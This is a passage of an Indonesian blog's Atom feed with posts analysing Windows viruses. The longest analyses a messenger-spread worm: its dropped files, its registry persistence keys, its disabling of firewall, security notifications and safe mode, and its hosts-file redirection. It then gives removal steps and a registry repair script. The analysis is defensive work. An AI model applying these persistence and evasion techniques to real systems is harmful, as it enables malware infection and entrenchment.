width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-6088904342336582428</id><published>2010-01-25T17:54:00.000-08:00</published><updated>2010-01-25T17:55:53.464-08:00</updated><title type='text'>Virus Zhola</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S15LnsvzZRI/AAAAAAAAABc/qKGbTT4zIIY/s1600-h/zhola.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px; height: 232px;" src="http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S15LnsvzZRI/AAAAAAAAABc/qKGbTT4zIIY/s320/zhola.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5430861346054038802" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Zhola. Dibuat dengan bahasa pemrograman Visual Basic tanpa di-pack, berukuran sekitar 672 KB, virus Zhola termasuk virus yang memiliki payload ganas. Icon yang dimilikinya menyerupai icon software lokal. Ia akan mencari berbagai file dokumen dan multimedia, untuk kemudian menghapusnya dan menggantikan dengan file virus yang menyamar dengan nama file tersebut. Di dalam tubuhnya, virus menyimpan ekstensi file berikut: *.doc,*.jpg,*.mp3,*.avi,*.mpeg,*.3gp,*.flv,*.mpg,*.mov,*.wmv,*.wav,*.3gp2. Setiap file dengan ekstensi tersebut akan menjadi incaran virus. Selain itu pada setiap root drive yang ditemuinya, virus juga menciptakan file dengan nama windows.exe, Love Letter 4 Zhola.exe, dan autorun.inf seperti tampak pada screenshot.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-6088904342336582428?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/6088904342336582428/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-zhola.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6088904342336582428'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6088904342336582428'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-zhola.html' title='Virus Zhola'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S15LnsvzZRI/AAAAAAAAABc/qKGbTT4zIIY/s72-c/zhola.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-4456780873820224417</id><published>2010-01-25T17:53:00.000-08:00</published><updated>2010-01-25T17:54:11.737-08:00</updated><title type='text'>Virus SlowButSure.vbs.G</title><content type='html'>SlowButSure.vbs.G. Dibuat dengan VBScript dan berukuran sekitar 8 KB, pada tubuhnya tertulis&lt;br /&gt;“My name is Slow but sure V1.08“. Jangan terkecoh jika virus ini justru memperbaiki registry, seperti menampilkan Task Manager jika keadaannya disabled, mengembalikan menu Folder Options pada Windows Explorer jika keadaannya ter-hidden, dan perbaikan registry-registry lain yang umum diubah virus.Tapi apa gunanya jika ia sendiri menyebar dan membuat tampilan-tampilan yang mengganggu? Salah satunya adalah mengubah system property My Computer seperti pada gambar, tertulis:&lt;br /&gt;&lt;br /&gt;Registered To:&lt;br /&gt;&lt;br /&gt;amaze&lt;br /&gt;I’m Not Panic, Virus anda sudah kami lumpuhkan !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-4456780873820224417?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/4456780873820224417/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-slowbutsurevbsg.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/4456780873820224417'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/4456780873820224417'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-slowbutsurevbsg.html' title='Virus SlowButSure.vbs.G'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-2838305135507488948</id><published>2010-01-25T17:46:00.000-08:00</published><updated>2010-01-25T17:51:38.591-08:00</updated><title type='text'>Kalau McGyver membuat virus</title><content type='html'>Masih ingat film McGyver yang dibintangi oleh Richard Dean Sanderson ? Di tangan McGyver, barang apapun yang ada di dekatnya bisa dijadikan sebagai alat atau senjata yang ampuh. Dengan bantuan Victorinox dan kreativitasnya, ia bisa meracik bahan-bahan yang biasa ada di rumah menjadi senjata mematikan seperti pelontar api sampai merakit bom. Rupanya hal yang sama terjadi pada dunia maya dimana hanya dengan bahasa pemrograman yang dipandang sebelah mata (VB Script) oleh para programmer diciptakan satu virus yang secara de Facto hari ini menjadi virus yang paling ganas dan paling banyak mengganggu di awal tahun 2010. Siapakah dia ? Tidak lain dan tidak bukan adalah Messenger yang di deteksi secara generik dengan nama W32/VBTroj.CEPA. Virus ini mampu melakukan banyak sekali hal seperti menginstal rootkit, memblok akses jaringan dan memanipulasi file hosts Windows supaya bisa melakukan pemblokiran akses ke situs-situs sekuriti pada komputer korbannya. Dan canggihnya lagi, file hosts tersebut di enkrip untuk menghindari deteksi dan perbaikan oleh program antivirus.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Baru-baru ini telah muncul satu virus lain ikut merampaikan acara tutup tahun ini, walaupun virus ini dibuat dengan program bahasa Visual Basic tetapi efek yang dihasilkan cukup merepotkan, ia akan melakukan blok terhadap ”hampir” semua tools security termasuk antivirus yang umum sering digunakan oleh user dengan cara membaca ”nama file” dari aplikasi tersebut.&lt;br /&gt;&lt;br /&gt;Virus ini juga akan melakukan blok akses ke beberapa situs sekuriti atau situs lain yang telah ditentukan dengan cara mengalihkan ke nomor ip 209.85.225.99 yang merupakan ip publik www.google.com (lihat gambar 1), hal ini secara tidak langsung sebenarnya menyebabkan Ddos terhadap situs Google.com. Apakah ada hubungan atau tidak dengan serangan terhadap Google di China yang mengakibatkan Google mempertimbangkan untuk hengkang .... kita lihat saja. Yang jelas, makin banyak komputer yang terinfeksi oleh virus ini, maka akses (yang secara tidak langsung menyebabkan Ddos) terhadap situs awal Google akan makin tinggi.&lt;br /&gt;&lt;br /&gt;Sehingga setiap kali user mencoba untuk akses ke website tertentu termasuk website security / antivirus, maka yang muncul adalah situs www.google.com. Untuk melakukan hal ini ia akan menambahkan alamat website yang akan di blok ke sebuah file HOSTS yang berada di direktori  [C:\Windows\System32\Drivers\etc]&lt;br /&gt;&lt;br /&gt;Virus ini menyebar sangat cepat dengan memanfaatkan media chatting yang umum digunakan oleh user seperti Yahoo Messenger, MSN Messenger dan Skype dengan cara mengirimkan sebuah pesan dan melampirkan link untuk download sebuah file yang   direkayasa seolah-olah file gambar (JPG) tetapi sebenarnya merupakan file virus yang  sudah dikompres dengan nama file [%file%.JPG.ZIP] dengan ukuran yang berdeda-beda tegantung pada varian yang menginfeksi komputer tersebut, file yang dikompres tersebut mempunyai ekstensi EXE. Jika menerima pesan tersebut sebaiknya jangan anda terima apalagi menjalankan file yang disertakan walaupun dari  kontak Messenger   teman yang  anda kenal, memang bukan teman anda yang mengirimkan virus tetapi virus yang menginfeksi komputernya dan memanfaatkan rekening Messengernya.&lt;br /&gt;&lt;br /&gt;  Salah satu hal yang menyebabkan virus ini sukses menyebar selain menggunakan media yang disebutkan di atas, ia juga akan melakukan update untuk memperbaharui dirinya hal inilah yang menyebabkan scaner antivirus tidak dapat mendeteksi virus tersebut. Virus ini semakin kuat bercokol dengan bantuan sebuah file rootkit yang bertugas untuk melindungi file induk yang aktif di  memori, sehingga pembersihan yang dilakukan melalui windows Normal, Safe Mode atau safe Mode With Command Prompt terkadang tidak dapat menyelesaikan masalah, bagaimana mengatasi hal ini ?  Silahkan simak pada bagian terakhir artikel ini.&lt;br /&gt;&lt;br /&gt;Seperti yang sudah di jelaskan di atas bahwa virus ini dibuat dengan menggunakan bahasa Visual Basic, untuk file induk virus ini mempunyai ukuran yang bervariasi tergantung dari varian yang menginfeksi komputer target, biasanya akan mempunyai ukuran di atas 200 KB, sedangkan file pendukung lainnya mempunyai ukuran yang berbeda-beda yang akan di simpan didirektori yang berbeda-beda.&lt;br /&gt;&lt;br /&gt;  Virus ini akan menggunakan icon Project Visual Basic dan untuk beberapa kasus akan menggunakan icon MSN Messanger untuk mengelabui user.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Bagaimana mengenali virus ini?&lt;br /&gt;&lt;br /&gt;§  Akan menampilkan website www.google.com pada saat user mengakses web security / web antivirus, untuk beberapa varian tidak akan menampilkan website di atas.&lt;br /&gt;&lt;br /&gt;§  Disable CMD dengan cara menutup aplikasi ini secara otomatis saat dijalankan.&lt;br /&gt;&lt;br /&gt;§  Untuk beberapa varian, komputer yang terinfeksi akan dapat mengakses komputer lain dalam jaringan. Tetapi sebaliknya, komputer tersebut tidak akan dapat diakses oleh komputer lain dalam jaringan. Salah satu kemungkinan aksi ini dilakukan adalah untuk mempersulit pembersihan dan sekaligus mencegah infeksi ulang pada komptuer yang sudah terinfeksi.&lt;br /&gt;&lt;br /&gt;§  Terdapat perubahan pada file [C:\Windows\system32\drivers\etc\hosts], dengan menambahkan daftar alamat website yang akan di blok dengan format penulisan ip 209.85.225.99 yang di ikuti alamat website, untuk beberapa kasus virus ini akan mengenkripsi file hosts tersebut sehingga user tidak dapat mengetahui isi script yang di ubah, dengan bantuan tools maka anda dapat melihat dengan jelas isi dari file hosts tersebut.&lt;br /&gt;&lt;br /&gt;  File induk Virus&lt;br /&gt;&lt;br /&gt;Pada saat virus ini di aktifkan, ia akan membuat beberapa file induk yang  akan di simpan dibeberapa lokasi yang berbeda-beda yang akan di aktifkan setiap kali komputer dinyalakan. Selain itu virus ini juga akan menyamarkan dirinya sebagai sebuah service Windows dan sebuah drivers yang berfungsi sebagai rootkit yang salah satu tugasnya akan melindungi proses virus yang aktif dimemori sehingga mempersulit dalam proses pembersihan dengan nama file yang berbeda-beda.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Berikut beberapa file yang akan dibuat oleh virus:&lt;br /&gt;&lt;br /&gt;    * C:\windows\System32&lt;br /&gt;&lt;br /&gt;ü  Wmi%xxx.exe, dimana xxx menunjukan karater acak (contohnya: wmispqd.exe, wmisrwt.exe, wmistpl.exe, atu wmisfpj.exe) dengan ukuran file yang berbeda-beda tergantung varian yang menginfeksi computer target.&lt;br /&gt;&lt;br /&gt;ü  %xxx%.exe@, dimana %xxx% menunjukan karakter acak (contoh: qxzv85.exe@) dengan ukuran yang berbeda-beda tergantung varian yang menginfeksi.&lt;br /&gt;&lt;br /&gt;ü  secupdat.dat&lt;br /&gt;&lt;br /&gt;    * C:\Documents and Settings\%user%\%xx%.exe, dimana xx adalah karakter acak (contoh: rllx.exe) dengan ukuran file sekitar 6 kb atau 16 kb (tergantung varian yang menginfeksi). File ini akan disembunyikan oleh virus guna mempersulit dalam penghapusan.&lt;br /&gt;    * C:\Windows\System32\drivers&lt;br /&gt;&lt;br /&gt;ü  Kernelx86.sys&lt;br /&gt;&lt;br /&gt;ü  %xx%.sys, dimana xx ini adalah karakter acak yang mempunyai ukuran sekitar 40 KB (contoh: mojbtjlt.sys atau cvxqvksf.sys)&lt;br /&gt;&lt;br /&gt;ü  Ndisvvan.sys&lt;br /&gt;&lt;br /&gt;ü  krndrv32.sys&lt;br /&gt;&lt;br /&gt;    * C:\Documents and Settings\%user%\secupdat.dat&lt;br /&gt;    * C:\Windows\INF&lt;br /&gt;&lt;br /&gt;ü  netsf.inf&lt;br /&gt;&lt;br /&gt;ü  netsf_m.inf&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Autorun&lt;br /&gt;&lt;br /&gt;Agar file tersebut dapat di jalankan secara otomatis, ia akan membuat string pada  registri dengan memanipulasi file windows dengan nama ctfmon.exe, Sebenarnya trik ini digunakan agar user tidak curiga, tapi jika dilusuri lebih jauh ini adalah langkah yang brilian karena file ini justru mempunyai peranan yang sangat penting agar dirinya dapat aktif secara otomatis dengan menjalankan file virus yang sudah ditentukan. Selain itu ia juga akan aktif setiap kali user menjalankan file “explorer.exe” atau membuka  aplikasi “Windows Explorer”&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run&lt;br /&gt;&lt;br /&gt;·         ctfmon.exe&lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe&lt;br /&gt;&lt;br /&gt;·         Debugger =  %file_induk_virus%.exe (contoh : wmistpl.exe)&lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon&lt;br /&gt;&lt;br /&gt;·         shell = explorer.exe "C:\Documents and Settings\%user%\%xx%.exe”&lt;br /&gt;&lt;br /&gt;Catatan: %xx%, adalah karakter acak, contoh:  rllx.exe&lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\system\ControlSet001\services&lt;br /&gt;&lt;br /&gt;·         %xx% menunjukan file acak&lt;br /&gt;&lt;br /&gt;o   Image path = System32\drivers\%xx%.sys (contoh: jdwjlyju.sys)&lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\system\CurrentControlSet\services&lt;br /&gt;&lt;br /&gt;·         %xx% menunjukan file acak      &lt;br /&gt;&lt;br /&gt;o   Image path = System32\drivers\%xx%.sys (contoh: jdwjlyju.sys)&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Blok fungsi Windows&lt;br /&gt;&lt;br /&gt;Untuk memperlancar aksi nya ia akan blok beberapa fungsi windows termasuk disable System Restore, disable Windows Firewall, disable RPC DCOM, disable upgrade  Service Pack 2 dan tidak bisa menampilkan file yang tersembunyi dengan merubah string pada registry berikut:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\software\microsoft\ole&lt;br /&gt;&lt;br /&gt;·         EnableDCOM =  N&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\software\microsoft\security center&lt;br /&gt;&lt;br /&gt;·         AntiVirusDisableNotify = 1&lt;br /&gt;&lt;br /&gt;·         FirewallDisableNotify = 1&lt;br /&gt;&lt;br /&gt;·         AntiVirusOverride = 1&lt;br /&gt;&lt;br /&gt;·         FirewallOverride = 1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore&lt;br /&gt;&lt;br /&gt;·         DisableConfig = 1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate&lt;br /&gt;&lt;br /&gt;·         DoNotAllowXPSP2 = 1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden&lt;br /&gt;&lt;br /&gt;·         DefaultValue = 0&lt;br /&gt;&lt;br /&gt;·         CheckedValue = 1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\system\ControlSet001\control\lsa&lt;br /&gt;&lt;br /&gt;·         restrictanonymous = 1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\system\CurrentControlSet\control\lsa&lt;br /&gt;&lt;br /&gt;·         restrictanonymous = 1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ia juga akan merubah registry berikut:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;br /&gt;&lt;br /&gt;·       userinit = C:\WINDOWS\system32\Userinit.exe, ,C:\Documents and Settings\%user%\%files_virus%.exe \s (%file_virus, menunjukan nama file yang berbeda-beda tergantung varian yang menginfeksi, ontohnya: fnhh.exe).&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Agar file virus tersebut dapat aktif secara bebas di computer target, ia juga akan mendaftarkan file induk virus tersebut dan rule windows firewall berikut :&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List&lt;br /&gt;&lt;br /&gt;·         C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe) = C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe) :*:Enabled:UPnP Firewall&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List&lt;br /&gt;&lt;br /&gt;·         C:\windows\system32\ file_induk_virus%.exe (contoh: wmistpl.exe) = C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe) :*:Enabled:UPnP Firewall&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Selain dengan membuat string registry tersebut, ia juga akan blok “hampir” semua tools sekuriti yang umum digunakan dengan cara membaca nama file dari aplikasi tersebut.&lt;br /&gt;&lt;br /&gt;  Blok akses Internet&lt;br /&gt;&lt;br /&gt;Sebagai oleh-oleh ia akan mencoba untuk blok akses ke website security termasuk antivirus, dengan cara menampilkan website www.google.com (untuk beberapa varian tertentu untuk blok akses web sekuriti tidak akan menampilkan web www.google.com).&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Untuk melakukan hal ini ia akan merubah isi file Hosts Windows yang berada di direktori [C:\Windows\System32\Drivers\Etc\Hosts] dengan cara menambahkan nomor ip publik www.google.com di ikuti dengan alamat website yang akan diblok dan untuk beberapa kasus virus ini akan mengenkripsi file tersebut sehingga user tidak dapat mengetahui isi dari tersebut.&lt;br /&gt;&lt;br /&gt; Update layaknya antivirus&lt;br /&gt;&lt;br /&gt;Virus ini dapat melakukan update layaknya program antivirus dengan mendownload beberapa file dari website yang telah ditentukan, file ini biasanya akan di simpan didirektori [C:\Windows\System32] dengan format file %xxx%.exe@, dimana %xxx% merupakan nama file dan ukuran yang berbeda-beda (contoh: qxzv85.exe@)&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Blok akses “Safe Mode” dan  ”Safe Mode with command prompt”&lt;br /&gt;&lt;br /&gt;Untuk beberapa kasus virus ini juga akan berupaya untuk menghapus key “safeboot” sehingga komputer tidak dapat booting ke mode “safe mode” dan “safe mode with command prompt”. Untuk melakukan hal ini ia akan menghapus string berikut:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot&lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot&lt;br /&gt;&lt;br /&gt;Ø  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Media Penyebaran&lt;br /&gt;&lt;br /&gt;Untuk menyebarkan dirinya ia akan memanfaatkan media chatting yang umum digunakan oleh user seperti Yahoo Messenger, Gtalk, Skype dan MSN Messenger dengan mengirimkan sebuah pesan kesemua alamat ID yang ada di komputer target dengan menyertakan link untuk mendownload sebuahlampiran yang sudah dikompresi dengan ukuran yang bervariasi sesuai dengan varian yang menginfeksi, file tersebut mempunyai nama file [%file%.JPG.ZIP], file yang dikompres tersebut mempunyai ekstensi EXE. Jika menerima pesan tersebut sebaiknya jangan anda terima apalagi menjalankan file yang disertakan kecuali anda mau terinfeksi virus ini.&lt;br /&gt;&lt;br /&gt;Pesan yang akan disampaikan mempunyai isi yang berbeda-beda, sedangkan untuk link yang di sertakan salah satunya mengarah kesebuah alamat 208.77.45.10.&lt;br /&gt;&lt;br /&gt;1.     Putuskan  komputer yang akan di bersihkan dari jaringan maupun internet&lt;br /&gt;&lt;br /&gt;2.       Ubah nama file [C:\Windws\system32\msvbvm60.dll] menjadi [xmsvbvm60.dll] untuk mencegah virus aktif kembali selama proses pembersihan.&lt;br /&gt;&lt;br /&gt;3.       Sebaiknya lakukan pembersihan dengan menggunakan Tools Windows Mini PE Live CD hal ini disebabkan untuk beberapa file induk dan file rootkit yang menyamar sebagai services dan drivers sulit untuk di hapus terlebih file ini akan disembunyikan oleh virus.&lt;br /&gt;&lt;br /&gt;         &lt;br /&gt;&lt;br /&gt;Kemudian booting komputer dengan menggunakan software Mini PE Live CD tersebut. Setelah itu hapus beberapa file iduk virus dengan cara : (lihat gambar 11)&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;·         Klik menu [Mini PE2XT]&lt;br /&gt;&lt;br /&gt;·         Klik menu [Programs]&lt;br /&gt;&lt;br /&gt;·         Klik menu [File Management]&lt;br /&gt;&lt;br /&gt;·         Klik menu [Windows Explorer]&lt;br /&gt;&lt;br /&gt;·         Kemudian hapus file berikut:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;ü C:\Windows\System32&lt;br /&gt;&lt;br /&gt;§  Wmi%xxx.exe, dimana xxx menunjukan karater acak (contohnya: wmispqd.exe, wmisrwt.exe, wmistpl.exe, atu wmisfpj.exe) dengan ukuran file yang berbeda-beda tergantung varian yang menginfeksi computer target.&lt;br /&gt;&lt;br /&gt;§  %xxx%.exe@, dimana %xxx% menunjukan karakter acak (contoh: qxzv85.exe@) dengan ukuran yang berbeda-beda tergantung varian yang menginfeksi.&lt;br /&gt;&lt;br /&gt;§  secupdat.dat&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;ü  C:\Documents and Settings\%user%\%xx%.exe, dimana xx adalah karakter acak (contoh: rllx.exe) dengan ukuran file sekitar 6 kb atau 16 kb (tergantung varian yang menginfeksi).&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;ü  C:\Windows\System32\drivers&lt;br /&gt;&lt;br /&gt;§  Kernelx86.sys&lt;br /&gt;&lt;br /&gt;§  %xx%.sys, dimana xx ini adalah karakter acak yang mempunyai ukuran sekitar 40 KB (contoh: mojbtjlt.sys atau cvxqvksf.sys)&lt;br /&gt;&lt;br /&gt;§  Ndisvvan.sys&lt;br /&gt;&lt;br /&gt;§  krndrv32.sys&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;ü  C:\Documents and Settings\%user%\secupdat.dat&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;ü  C:\Windows\INF&lt;br /&gt;&lt;br /&gt;§  netsf.inf&lt;br /&gt;&lt;br /&gt;§  netsf_m.inf&lt;br /&gt;&lt;br /&gt;  Gambar 11, Gunakan Windows Mini PE untuk menghapus file virus&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;4.       Hapus registry yang dubah dibuat oleh virus, dengan menggunakan "Avas! Registry Editor", caranya : (lihat gambar 12)&lt;br /&gt;&lt;br /&gt;·         Klik menu [Mini PE2XT]&lt;br /&gt;&lt;br /&gt;·         Klik menu [Programs]&lt;br /&gt;&lt;br /&gt;·         Klik menu [Registry Tools]&lt;br /&gt;&lt;br /&gt;·         Klik [Avast! Registry Editor]&lt;br /&gt;&lt;br /&gt;·         Jika muncul layar konfirmasi kelik tombol "Load....."&lt;br /&gt;&lt;br /&gt;·         Kemudain hapus registry:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SOFTWARE\microsoft\windows\currentverson\run\\ctfmon.exe&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SYSTEM\ControlSet001\services\\kernelx86&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SYSTEM\CurrentControlSet\services\\kernelx86&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SYSTEM\CurrentControlSet\services\\passthru&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\\ctfmon.exe&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SOFTWARE\microsoft\windows nt\currentversion\winlogon&lt;br /&gt;&lt;br /&gt;§  Ubah value pada string Userinit menjadi = userinit.exe,&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SOFTWARE\microsoft\windows nt\currentversion\winlogon&lt;br /&gt;&lt;br /&gt;§   Ubah value pada string Shell menjadi = Explorer.exe&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SYSTEM\ControlSet001\services\\%xx%&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SYSTEM\CurrentControlSet\services\\%xx%&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\\C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe)&lt;br /&gt;&lt;br /&gt;ü  LOCAL_MACHINE_SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe)&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Catatan:&lt;br /&gt;&lt;br /&gt;%xx% menunjukan karakter acak, key ini dibuat untuk menjalankan file .SYS yang mempunyai ukuran sebesar 40 KB yang berada di direktori [C:\Windows\system32\drivers\] &lt;br /&gt;&lt;br /&gt;5.        Restart komputer, pulihkan sisa registry yang diubah oleh virus dengan copy script berikut pada program notepad kemudian simpan dengan nama repair.inf. Jalankan file tersebut dengan cara: klik kanan repair.inf | klik install&lt;br /&gt;&lt;br /&gt;       &lt;br /&gt;&lt;br /&gt;        [Version]&lt;br /&gt;&lt;br /&gt;Signature="$Chicago$"&lt;br /&gt;&lt;br /&gt;Provider=Vaksincom Oyee&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;[DefaultInstall]&lt;br /&gt;&lt;br /&gt;AddReg=UnhookRegKey&lt;br /&gt;&lt;br /&gt;DelReg=del&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;[UnhookRegKey]&lt;br /&gt;&lt;br /&gt;HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"&lt;br /&gt;&lt;br /&gt;HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"&lt;br /&gt;&lt;br /&gt;HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"&lt;br /&gt;&lt;br /&gt;HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"&lt;br /&gt;&lt;br /&gt;HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""&lt;br /&gt;&lt;br /&gt;HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"&lt;br /&gt;&lt;br /&gt;HKLM, software\microsoft\ole, EnableDCOM,0, "Y"&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusDisableNotify,0x00010001,0&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Security Center,FirewallDisableNotify,0x00010001,0&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusOverride,0x00010001,0&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Security Center,FirewallOverride,0x00010001,0&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\ControlSet001\Control\Lsa, restrictanonymous, 0x00010001,0&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\ControlSet002\Control\Lsa, restrictanonymous, 0x00010001,0&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\CurrentControlSet\Control\Lsa, restrictanonymous, 0x00010001,0&lt;br 